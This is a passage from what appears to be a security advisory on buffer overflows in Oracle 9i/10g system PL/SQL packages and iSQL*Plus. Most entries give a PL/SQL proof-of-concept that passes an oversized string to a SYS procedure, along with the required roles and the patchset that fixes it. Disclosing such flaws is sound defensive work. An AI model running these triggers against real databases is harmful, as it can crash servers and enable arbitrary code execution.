DBMS_REPCAT_CONF.ADD_PRIORITY_VARCHAR2
DBMS_REPCAT_CONF.ADD_SITE_PRIORITY_SITE
DBMS_REPCAT_CONF.ADD_UNIQUE_RESOLUTION
DBMS_REPCAT_CONF.ADD_UPDATE_RESOLUTION
DBMS_REPCAT_CONF.ALTER_PRIORITY
DBMS_REPCAT_CONF.ALTER_PRIORITY_CHAR
DBMS_REPCAT_CONF.ALTER_PRIORITY_DATE
DBMS_REPCAT_CONF.ALTER_PRIORITY_NCHAR
DBMS_REPCAT_CONF.ALTER_PRIORITY_NUMBER
DBMS_REPCAT_CONF.ALTER_PRIORITY_NVARCHAR2
DBMS_REPCAT_CONF.ALTER_PRIORITY_RAW
DBMS_REPCAT_CONF.ALTER_PRIORITY_VARCHAR2
DBMS_REPCAT_CONF.ALTER_SITE_PRIORITY
DBMS_REPCAT_CONF.ALTER_SITE_PRIORITY_SITE
DBMS_REPCAT_CONF.CANCEL_STATISTICS
DBMS_REPCAT_CONF.CHECK_GROUP_INFO
DBMS_REPCAT_CONF.CHECK_ONAME_INFO
DBMS_REPCAT_CONF.COMMENT_ON_COLUMN_GROUP
DBMS_REPCAT_CONF.COMMENT_ON_DELETE_RESOLUTION
DBMS_REPCAT_CONF.COMMENT_ON_PRIORITY_GROUP
DBMS_REPCAT_CONF.COMMENT_ON_SITE_PRIORITY
DBMS_REPCAT_CONF.COMMENT_ON_UNIQUE_RESOLUTION
DBMS_REPCAT_CONF.COMMENT_ON_UPDATE_RESOLUTION
DBMS_REPCAT_CONF.DEFINE_COLUMN_GROUP
DBMS_REPCAT_CONF.DEFINE_PRIORITY_GROUP
DBMS_REPCAT_CONF.DEFINE_SITE_PRIORITY
DBMS_REPCAT_CONF.DROP_COLUMN_GROUP
DBMS_REPCAT_CONF.DROP_DELETE_RESOLUTION
DBMS_REPCAT_CONF.DROP_GROUPED_COLUMN
DBMS_REPCAT_CONF.DROP_PRIORITY
DBMS_REPCAT_CONF.DROP_PRIORITY_CHAR
DBMS_REPCAT_CONF.DROP_PRIORITY_DATE
DBMS_REPCAT_CONF.DROP_PRIORITY_GROUP
DBMS_REPCAT_CONF.DROP_PRIORITY_NCHAR
DBMS_REPCAT_CONF.DROP_PRIORITY_NUMBER
DBMS_REPCAT_CONF.DROP_PRIORITY_NVARCHAR2
DBMS_REPCAT_CONF.DROP_PRIORITY_RAW
DBMS_REPCAT_CONF.DROP_PRIORITY_VARCHAR2
DBMS_REPCAT_CONF.DROP_SITE_PRIORITY
DBMS_REPCAT_CONF.DROP_SITE_PRIORITY_SITE
DBMS_REPCAT_CONF.DROP_UNIQUE_RESOLUTION
DBMS_REPCAT_CONF.DROP_UPDATE_RESOLUTION
DBMS_REPCAT_CONF.MAKE_COLUMN_GROUP
DBMS_REPCAT_CONF.PURGE_STATISTICS
DBMS_REPCAT_CONF.REGISTER_STATISTICS
DBMS_REPCAT_FLA.ABORT_DEFINITION
DBMS_REPCAT_FLA.ABORT_FLAVOR_DEFINITION
DBMS_REPCAT_FLA.ADD_OBJECT
DBMS_REPCAT_FLA.ADD_OBJECT_TO_FLAVOR
DBMS_REPCAT_FLA.BEGIN_DEFINITION
DBMS_REPCAT_FLA.BEGIN_FLAVOR_DEFINITION
DBMS_REPCAT_FLA.DROP_OBJECT
DBMS_REPCAT_FLA.DROP_OBJECT_FROM_FLAVOR
DBMS_REPCAT_FLA.ENSURE_NOT_PUBLISHED
DBMS_REPCAT_FLA.GENERATE_FLAVOR_NAME
DBMS_REPCAT_FLA.LOCAL_OBJECT_MATCHES
DBMS_REPCAT_FLA.SET_LOCAL_FLAVOR
DBMS_REPCAT_FLA.VALIDATE_DEFINITION
DBMS_REPCAT_FLA.VALIDATE_FLAVOR_DEFINITION
DBMS_REPCAT_FLA.VALIDATE_FOR_LOCAL_FLAVOR
DBMS_REPCAT_FLA.VALIDATE_LOCAL
DBMS_REPCAT_FLA.VALIDATE_LOCAL_COLS
DBMS_REPCAT_FLA.VALIDATE_LOCAL_MAS
DBMS_REPCAT_FLA.VALIDATE_LOCAL_SNAP
DBMS_REPCAT_FLA.VALIDATE_TABLE
DBMS_REPCAT_FLA_MAS.ADD_COLUMN_GROUP_TO_FLAVOR
DBMS_REPCAT_FLA_MAS.ADD_COLUMNS_TO_FLAVOR
DBMS_REPCAT_FLA_MAS.DROP_COLUMN_GROUP_FROM_FLAVOR
DBMS_REPCAT_FLA_MAS.DROP_COLUMNS_FROM_FLAVOR
DBMS_REPCAT_FLA_MAS.OBSOLETE_DEFINITION
DBMS_REPCAT_FLA_MAS.OBSOLETE_FLAVOR_DEFINITION
DBMS_REPCAT_FLA_MAS.PUBLISH_DEFINITION
DBMS_REPCAT_FLA_MAS.PUBLISH_FLAVOR_DEFINITION
DBMS_REPCAT_FLA_MAS.PURGE_DEFINITION
DBMS_REPCAT_FLA_MAS.PURGE_FLAVOR_DEFINITION
DBMS_REPCAT_FLA_UTL.CANONICALIZE_FLAVOR
DBMS_REPCAT_FLA_UTL.CANONICALIZE_OBJECT
DBMS_REPCAT_INSTANTIATE.DROP_SITE_INSTANTIATION
DBMS_REPCAT_INSTANTIATE.INSTANTIATE_OFFLINE
DBMS_REPCAT_INSTANTIATE.INSTANTIATE_ONLINE
DBMS_REPCAT_MAS.ADD_MASTER_DATABASE
DBMS_REPCAT_MAS.ALTER_MASTER_PROPAGATION
DBMS_REPCAT_MAS.ALTER_MASTER_REPOBJECT
DBMS_REPCAT_MAS.COMMENT_ON_REPGROUP
DBMS_REPCAT_MAS.COMMENT_ON_REPOBJECT
DBMS_REPCAT_MAS.COMMENT_ON_REPSITES
DBMS_REPCAT_MAS.CREATE_MASTER_REPGROUP
DBMS_REPCAT_MAS.CREATE_MASTER_REPOBJECT
DBMS_REPCAT_MAS.DO_DEFERRED_REPCAT_ADMIN
DBMS_REPCAT_MAS.DROP_MASTER_REPGROUP
DBMS_REPCAT_MAS.ENSURE_MASTERDEF
DBMS_REPCAT_MAS.EXECUTE_DDL
DBMS_REPCAT_MAS.GENERATE_REPLICATION_PACKAGE
DBMS_REPCAT_MAS.GENERATE_REPLICATION_SUPPORT
DBMS_REPCAT_MAS.GENERATE_REPLICATION_TRIGGER
DBMS_REPCAT_MAS.PURGE_MASTER_LOG
DBMS_REPCAT_MAS.RELOCATE_MASTERDEF
DBMS_REPCAT_MAS.REMOVE_MASTER_DATABASES
DBMS_REPCAT_MAS.RENAME_SHADOW_COLUMN_GROUP
DBMS_REPCAT_MAS.RESUME_MASTER_ACTIVITY
DBMS_REPCAT_MAS.SEND_AND_COMPARE_OLD_VALUES
DBMS_REPCAT_MAS.SET_COLUMNS
DBMS_REPCAT_MAS.SUSPEND_MASTER_ACTIVITY
DBMS_REPCAT_MAS.WAIT_MASTER_LOG
DBMS_REPCAT_OBJ_UTL.LCNAME_TAB_TO_CNAME_TAB
DBMS_REPCAT_RGT.CHECK_DDL_TEXT
DBMS_REPCAT_RGT.CREATE_OBJECT_FROM_EXISTING
DBMS_REPCAT_RGT.DROP_SITE_INSTANTIATION
DBMS_REPCAT_RGT.INSTANTIATE_OFFLINE
DBMS_REPCAT_RGT.INSTANTIATE_ONLINE
DBMS_REPCAT_RGT_CUST.CREATE_OBJECT_FROM_EXISTING
DBMS_REPCAT_RPC.GET_OBJECT_SHAPE
DBMS_REPCAT_RPC.GET_OBJECT_SHAPE_RC
DBMS_REPCAT_RPC.RELOCATE_MASTERDEF
DBMS_REPCAT_RPC.RELOCATE_MASTERDEF_RC
DBMS_REPCAT_SNA.ALTER_SNAPSHOT_PROPAGATION
DBMS_REPCAT_SNA.CREATE_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA.CREATE_SNAPSHOT_REPOBJECT
DBMS_REPCAT_SNA.CREATE_SNAPSHOT_REPSCHEMA
DBMS_REPCAT_SNA.DROP_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA.DROP_SNAPSHOT_REPOBJECT
DBMS_REPCAT_SNA.DROP_SNAPSHOT_REPSCHEMA
DBMS_REPCAT_SNA.GENERATE_SNAPSHOT_SUPPORT
DBMS_REPCAT_SNA.REFRESH_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA.REFRESH_SNAPSHOT_REPSCHEMA
DBMS_REPCAT_SNA.REGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA.REPCAT_IMPORT_CHECK
DBMS_REPCAT_SNA.SET_LOCAL_FLAVOR
DBMS_REPCAT_SNA.SWITCH_SNAPSHOT_MASTER
DBMS_REPCAT_SNA.UNREGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA.VALIDATE_FOR_LOCAL_FLAVOR
DBMS_REPCAT_SNA_UTL.ALTER_SNAPSHOT_PROPAGATION
DBMS_REPCAT_SNA_UTL.CHECK_REGISTRATION_PARAMS
DBMS_REPCAT_SNA_UTL.CREATE_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA_UTL.CREATE_SNAPSHOT_REPOBJECT
DBMS_REPCAT_SNA_UTL.DROP_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA_UTL.DROP_SNAPSHOT_REPOBJECT
DBMS_REPCAT_SNA_UTL.GENERATE_SNAPSHOT_SUPPORT
DBMS_REPCAT_SNA_UTL.LOCAL_GENERATE_DDL
DBMS_REPCAT_SNA_UTL.REFRESH_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA_UTL.REGISTER_FLAVOR_CHANGE
DBMS_REPCAT_SNA_UTL.REGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_SNA_UTL.REMOTE_GENERATE_DDL
DBMS_REPCAT_SNA_UTL.REPCAT_IMPORT_CHECK
DBMS_REPCAT_SNA_UTL.SWITCH_SNAPSHOT_MASTER
DBMS_REPCAT_SNA_UTL.UNREGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_SQL_UTL.DO_ARRAY_DDL
DBMS_REPCAT_SQL_UTL.DO_DDL
DBMS_REPCAT_SQL_UTL.DO_MULTIPLE_DDLS
DBMS_REPCAT_UNTRUSTED.REGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_UNTRUSTED.UNREGISTER_SNAPSHOT_REPGROUP
DBMS_REPCAT_UTL.CANONICALIZE
DBMS_REPCAT_UTL.COMMENT_ON_REPSITES
DBMS_REPCAT_UTL.CONVERT_REASON_TO_ID
DBMS_REPCAT_UTL.CONVERT_TYPE_TO_ID
DBMS_REPCAT_UTL.DEFAULT_FUNCTION_NAME
DBMS_REPCAT_UTL.DROP_AN_OBJECT
DBMS_REPCAT_UTL.FOLLOW_SYNONYM_CHAIN
DBMS_REPCAT_UTL.GENERATE_WHAT_AM_I
DBMS_REPCAT_UTL.GET_REPCOLUMN_FLAG
DBMS_REPCAT_UTL.RESOLVE_NAME
DBMS_REPCAT_UTL.SET_REPCOLUMN_FLAG
DBMS_REPCAT_UTL2.CHECK_OBJECT_SHAPE
DBMS_REPCAT_UTL2.GET_OBJECT_SHAPE
DBMS_REPCAT_UTL3.RETRY_NEEDED
DBMS_REPCAT_UTL4.COMPARE_SOURCE
DBMS_REPCAT_UTL4.COMPARE_TABLES
DBMS_REPCAT_UTL4.DROP_MASTER_REPOBJECT
DBMS_REPCAT_UTL4.ENSURE_MASTER
DBMS_REPCAT_UTL4.MASTERDEF_PREFIX
DBMS_REPCAT_UTL4.NAME_CONFLICT_EXISTS
DBMS_REPCAT_VALIDATE.VALIDATE
To reproduce the overflow, execute the next PL/SQL:
BEGIN
SYS.DBMS_REPCAT_AUTH.GRANT_SURROGATE_REPCAT('longstring');
END;
or
BEGIN
SYS.DBMS_REPCAT_AUTH.REVOKE_SURROGATE_REPCAT('longstring');
END;
etc.
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users
granted execute permissions on the packages.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Oracle 9ir2 Patchset 4 (9.2.0.5). 10g not vulnerable.
#26 - Heap based buffer overflow Vulnerability in Oracle 10g iSQL*PLus
Service
Details:
SQL*Plus is an interactive and batch query tool that is installed with
every Oracle Database Server or Client installation. It has a command-line
user interface, a Windows Graphical User Interface (GUI) and the iSQL*Plus
web-based user interface. iSQL*Plus is a browser-based interface which
uses the SQL*Plus processing engine. A heap overflow vulnerability exists
on this service. To overflow the buffer you need to provide a long string
in the 'username' or in the 'connectID' parameters of /isqlplus/login.uix
Analysis:
A remote unaunteticated user can execute arbitrary code in the context of
the iSQLPlus Service.It can also be exploited to cause DOS (Denial of
service) killing Oracle server process.
Vendor Fix:
Oracle 9i not affected. Fixed in Oracle 10g Patchset 1.
#27 - Buffer overflow in procedure AQ_TABLE_DEFN_UPDATE of
DBMS_AQ_IMPORT_INTERNAL package
Details:
When AQ_TABLE_DEFN_UPDATE procedure is called with a long string in the
QT_NAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE p_6_PRIMARY_INSTANCE BINARY_INTEGER;
p_7_SECONDARY_INSTANCE BINARY_INTEGER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA || AAA;
SYS.DBMS_AQ_IMPORT_INTERNAL.AQ_TABLE_DEFN_UPDATE (QT_SCHEMA => 'SYS',
QT_NAME => AAA, UDATA => 1, QT_FLAGS => 1, SORT_COLS => 1,
PRIMARY_INSTANCE => p_6_PRIMARY_INSTANCE, SECONDARY_INSTANCE =>
p_7_SECONDARY_INSTANCE, COMMENT => 'Y');
END;
Analysis:
This vulnerability can be exploited by members of any of the following
roles EXECUTE_CATALOG_ROLE, EXP_FULL_DATABASE, EXP_FULL_DATABASE,
AQ_ADMINISTRATOR_ROLE, SYSDBA roles and users granted execute permissions
on DBMS_AQ_IMPORT_INTERNAL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#28 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_GET_NRP of
DBMS_AQADM package
Details:
When VERIFY_QUEUE_TYPES_GET_NRP procedure is called with a long string in
the SRC_QUEUE_NAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_SRC_QUEUE_NAME VARCHAR2(32767);
P_DEST_QUEUE_NAME VARCHAR2(32767);
P_DESTINATION VARCHAR2(32767);
P_RC BINARY_INTEGER;
P_TRANSFORMATION VARCHAR2(32767);
BEGIN
P_SRC_QUEUE_NAME := 'longstring';
P_DEST_QUEUE_NAME := '';
P_DESTINATION := '';
P_TRANSFORMATION := '';
SYS.DBMS_AQADM.VERIFY_QUEUE_TYPES_GET_NRP(SRC_QUEUE_NAME =>
P_SRC_QUEUE_NAME, DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
P_DESTINATION, RC => P_RC, TRANSFORMATION => P_TRANSFORMATION);
END;
Analysis:
This vulnerability can be exploited by members of any of the following
roles EXECUTE_CATALOG_ROLE, IMP_FULL_DATABASE, IMP_FULL_DATABASE, QS_ADM,
QS, QS_WS, QS_ES, QS_OS, QS_CBADM, QS_CB, QS_CS, SYSDBA roles and users
granted execute permissions on DBMS_AQADM package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#29 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_NO_QUEUE of
DBMS_AQADM package
Details:
When VERIFY_QUEUE_TYPES_NO_QUEUE procedure is called with a long string in
the SRC_QUEUE_NAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_SRC_QUEUE_NAME VARCHAR2(32767);
P_DEST_QUEUE_NAME VARCHAR2(32767);
P_DESTINATION VARCHAR2(32767);
P_RC BINARY_INTEGER;
P_TRANSFORMATION VARCHAR2(32767);
BEGIN
P_SRC_QUEUE_NAME := 'longstring';
P_DEST_QUEUE_NAME := '';
P_DESTINATION := '';
P_TRANSFORMATION := '';
SYS.DBMS_AQADM.VERIFY_QUEUE_TYPES_NO_QUEUE(SRC_QUEUE_NAME =>
P_SRC_QUEUE_NAME, DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
P_DESTINATION, RC => P_RC, TRANSFORMATION => P_TRANSFORMATION);
END;
Analysis:
This vulnerability can be exploited by members of any of the following
roles EXECUTE_CATALOG_ROLE, IMP_FULL_DATABASE, IMP_FULL_DATABASE, QS_ADM,
QS, QS_WS, QS_ES, QS_OS, QS_CBADM, QS_CB, QS_CS, SYSDBA roles and users
granted execute permissions on DBMS_AQADM package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#30 - Buffer overflow in procedure VERIFY_QUEUE_TYPES of DBMS_AQADM_SYS
package
Details:
When VERIFY_QUEUE_TYPES procedure is called with a long string in the
SRC_QUEUE_NAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_SRC_QUEUE_NAME VARCHAR2(32767);
P_DEST_QUEUE_NAME VARCHAR2(32767);
P_DESTINATION VARCHAR2(32767);
P_TRANSFORMATION VARCHAR2(32767);
P_QUEUE_EXISTS BOOLEAN;
P_GET_NRP BOOLEAN;
P_RC BINARY_INTEGER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
P_SRC_QUEUE_NAME := AAA;
P_DEST_QUEUE_NAME := '';
P_DESTINATION := '';
P_TRANSFORMATION := '';
P_QUEUE_EXISTS := FALSE;
P_GET_NRP := FALSE;
SYS.DBMS_AQADM_SYS.VERIFY_QUEUE_TYPES(SRC_QUEUE_NAME => P_SRC_QUEUE_NAME,
DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
P_DESTINATION, TRANSFORMATION => P_TRANSFORMATION, QUEUE_EXISTS =>
P_QUEUE_EXISTS, GET_NRP => P_GET_NRP, RC => P_RC);
END;
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users
granted execute permissions on DBMS_AQADM_SYS package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#31 - Buffer overflow in procedure PARALLEL_PUSH_RECOVERY of
DBMS_DEFER_INTERNAL_SYS package
Details:
When PARALLEL_PUSH_RECOVERY procedure is called with a long string in the
DESTINATION parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_DESTINATION VARCHAR2(32767);
P_ORIGIN VARCHAR2(32767);
BEGIN
P_DESTINATION := 'longstring';
P_ORIGIN := '';
SYS.DBMS_DEFER_INTERNAL_SYS.PARALLEL_PUSH_RECOVERY(DESTINATION =>
P_DESTINATION, ORIGIN => P_ORIGIN);
END;
Analysis:
This vulnerability can be exploited by members SYSDBA role and users
granted execute permissions on DBMS_DEFER_INTERNAL_SYS package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#32 - Buffer overflow in procedure ENABLE_PROPAGATION_TO_DBLINK of
DBMS_DEFER_REPCAT package
Details:
When ENABLE_PROPAGATION_TO_DBLINK procedure is called with a long string
as the parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
RET_VALUE_X123 BOOLEAN;
BEGIN
RET_VALUE_X123 :=
SYS.DBMS_DEFER_REPCAT.ENABLE_PROPAGATION_TO_DBLINK('longstring');
END;
or
DECLARE a BOOLEAN; -- return value
BEGIN
a := SYS.DBMS_DEFER_REPCAT.ENABLE_PROPAGATION_TO_DBLINK (DBLINK =>
'longstring', NORMAL_ONLY => FALSE, INTERNAL_SET => FALSE);
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA role and users granted execute permissions on DBMS_DEFER_REPCAT
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#33 - Buffer overflow in procedure DISABLE_RECEIVER_TRACE of
DBMS_INTERNAL_REPCAT package
Details:
When DISABLE_RECEIVER_TRACE procedure is called with a long string in the
GNAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
SYS.DBMS_INTERNAL_REPCAT.DISABLE_RECEIVER_TRACE (GNAME => 'longstring');
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA role and users granted execute permissions on DBMS_INTERNAL_REPCAT
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#34 - Buffer overflow in procedure ENABLE_RECEIVER_TRACE of
DBMS_INTERNAL_REPCAT package
Details:
When ENABLE_RECEIVER_TRACE procedure is called with a long string in the
GNAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
BEGIN
SYS.DBMS_INTERNAL_REPCAT.ENABLE_RECEIVER_TRACE (GNAME => 'longstring');
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA role and users granted execute permissions on DBMS_INTERNAL_REPCAT
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#35 - Buffer overflow in procedure VALIDATE of DBMS_INTERNAL_REPCAT
package
Details:
When VALIDATE procedure is called with a long string in the GNAME
parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
RET_VALUE_X123 BINARY_INTEGER;
P_GNAME VARCHAR2(32767);
P_CHECK_GENFLAGS BOOLEAN;
P_CHECK_VALID_OBJS BOOLEAN;
P_CHECK_LINKS_SCHED BOOLEAN;
P_CHECK_LINKS BOOLEAN;
P_ERROR_MSG_ID NUMBER;
P_ERROR_NUM_ID NUMBER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA || AAA;
P_GNAME := AAA;
P_CHECK_GENFLAGS := FALSE;
P_CHECK_VALID_OBJS := FALSE;
P_CHECK_LINKS_SCHED := FALSE;
P_CHECK_LINKS := FALSE;
P_ERROR_MSG_ID := 1;
P_ERROR_NUM_ID := 1;
RET_VALUE_X123 := SYS.DBMS_INTERNAL_REPCAT.VALIDATE(GNAME => P_GNAME,
CHECK_GENFLAGS => P_CHECK_GENFLAGS, CHECK_VALID_OBJS =>
P_CHECK_VALID_OBJS, CHECK_LINKS_SCHED => P_CHECK_LINKS_SCHED, CHECK_LINKS
=> P_CHECK_LINKS, ERROR_MSG_ID => P_ERROR_MSG_ID, ERROR_NUM_ID =>
P_ERROR_NUM_ID);
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA role and users granted execute permissions on DBMS_INTERNAL_REPCAT
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#36 - Buffer overflow in procedure DIFFERENCES of DBMS_RECTIFIER_DIFF
package
Details:
When DIFFERENCES procedure is called with a long string in the one of the
parameters a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
SYS.DBMS_RECTIFIER_DIFF.DIFFERENCES (SNAME1 => 'Y', ONAME1 => 'Y',
REFERENCE_SITE => 'Y', SNAME2 => 'Y', ONAME2 => 'Y', COMPARISON_SITE =>
'Y', WHERE_CLAUSE => 'Y', COLUMN_LIST => 'Y', MISSING_ROWS_SNAME => 'Y',
MISSING_ROWS_ONAME1 => AAA, MISSING_ROWS_ONAME2 => 'Y',
MISSING_ROWS_SITE => 'Y', MAX_MISSING => 1, COMMIT_ROWS => 1);
END;
Analysis:
This vulnerability can be exploited by members of EXECUTE_CATALOG_ROLE or
SYSDBA role and users granted execute permissions on DBMS_RECTIFIER_DIFF
package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#37 - Buffer overflow in procedure ADD_COLUMN of DBMS_REPCAT_RQ package
Details:
When ADD_COLUMN procedure is called with a long string in the SCHEMA_NAME
parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_SCHEMA_NAME VARCHAR2(32767);
P_OBJECT_NAME VARCHAR2(32767);
P_COLUMN_NAME VARCHAR2(32767);
P_DDL_TEXT CLOB;
P_COLUMN_GROUP_NAME VARCHAR2(32767);
P_NEW_GROUP VARCHAR2(32767);
P_RETRY BOOLEAN;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
P_SCHEMA_NAME := AAA;
P_OBJECT_NAME := 'Y';
P_COLUMN_NAME := 'Y';
P_COLUMN_GROUP_NAME := 'Y';
P_NEW_GROUP := 'Y';
P_RETRY := FALSE;
SYS.DBMS_REPCAT_RQ.ADD_COLUMN(SCHEMA_NAME => P_SCHEMA_NAME, OBJECT_NAME =>
P_OBJECT_NAME, COLUMN_NAME => P_COLUMN_NAME, DDL_TEXT =>
P_DDL_TEXT, COLUMN_GROUP_NAME => P_COLUMN_GROUP_NAME, NEW_GROUP =>
P_NEW_GROUP, RETRY => P_RETRY);
END;
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users
granted execute permissions on DBMS_REPCAT_RQ package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#39 - Buffer overflow in procedure IS_MASTER of DBMS_REPCAT_UTL package
Details:
When IS_MASTER procedure is called with a long string in the CANON_GNAME
parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
RET_VALUE_X123 BOOLEAN;
P_CANON_GOWNER VARCHAR2(32767);
P_CANON_GNAME VARCHAR2(32767);
P_MASTER VARCHAR2(32767);
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
P_CANON_GOWNER := '';
P_CANON_GNAME := AAA;
P_MASTER := '';
RET_VALUE_X123 := SYS.DBMS_REPCAT_UTL.IS_MASTER(CANON_GOWNER =>
P_CANON_GOWNER,CANON_GNAME => P_CANON_GNAME, MASTER => P_MASTER);
END;
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users
granted execute permissions on DBMS_REPCAT_UTL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary
code. It can also be exploited to cause DOS (Denial of service) killing
Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
#40 - Buffer overflow in procedure PUSHDEFERREDTXNS of LTUTIL package
Details:
When PUSHDEFERREDTXNS procedure is called with a long string in the
REPGRPNAME parameter a buffer overflow occurs.
